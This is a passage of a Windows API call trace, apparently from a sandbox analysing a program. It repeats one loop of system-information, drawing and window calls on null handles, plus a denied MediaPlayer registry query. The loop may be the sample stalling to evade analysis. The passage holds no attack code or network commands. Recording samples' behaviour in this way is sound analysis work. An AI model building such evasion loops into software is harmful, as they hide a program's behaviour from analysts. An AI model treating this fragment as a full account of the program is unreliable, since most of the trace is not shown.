dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.193] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.193] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.193] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.193] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.193] BeginPath (hdc=0x0) returned 0 [0092.193] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.193] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.193] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.193] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.193] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.193] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.194] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.194] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.194] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.194] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.194] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.194] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.194] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.194] BeginPath (hdc=0x0) returned 0 [0092.194] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.194] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.194] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.194] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.194] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.194] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.194] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.194] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.194] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.194] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.194] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.194] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.194] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.194] BeginPath (hdc=0x0) returned 0 [0092.194] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.194] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.194] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.194] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.195] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.195] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.195] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.195] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.195] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.195] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.195] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.195] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.195] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.195] BeginPath (hdc=0x0) returned 0 [0092.195] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.195] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.195] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.195] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.195] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.195] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.195] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.195] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.195] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.195] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.195] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.195] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.195] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.195] BeginPath (hdc=0x0) returned 0 [0092.195] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.195] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.196] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.196] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.196] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.196] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.196] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.196] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.196] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.196] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.196] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.196] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.196] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.196] BeginPath (hdc=0x0) returned 0 [0092.196] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.196] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.196] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.196] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.196] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.196] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.196] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.196] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.196] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.196] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.196] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.196] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.196] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.196] BeginPath (hdc=0x0) returned 0 [0092.196] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.196] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.197] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.197] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.197] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.197] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.197] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.197] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.197] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.197] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.197] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.197] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.197] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.197] BeginPath (hdc=0x0) returned 0 [0092.197] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.197] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.197] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.197] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.197] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.197] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.197] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.197] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.197] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.197] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.197] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.197] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.197] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.197] BeginPath (hdc=0x0) returned 0 [0092.197] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.197] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.198] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.198] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.198] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.198] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.198] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.198] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.198] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.198] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.198] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.198] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.198] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.198] BeginPath (hdc=0x0) returned 0 [0092.198] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.198] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.198] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.198] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.199] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.199] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.199] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.199] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.199] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.199] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.199] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.199] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.199] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.199] BeginPath (hdc=0x0) returned 0 [0092.199] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.199] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.199] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.199] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.199] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.199] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.199] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.199] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.199] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.199] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.199] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.200] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.200] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.200] BeginPath (hdc=0x0) returned 0 [0092.200] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.200] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.200] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.200] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.200] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.200] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.200] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.200] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.200] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.200] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.200] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.200] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.200] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.200] BeginPath (hdc=0x0) returned 0 [0092.200] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.200] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.200] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.200] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.200] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.200] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.200] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.200] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.201] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.201] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, 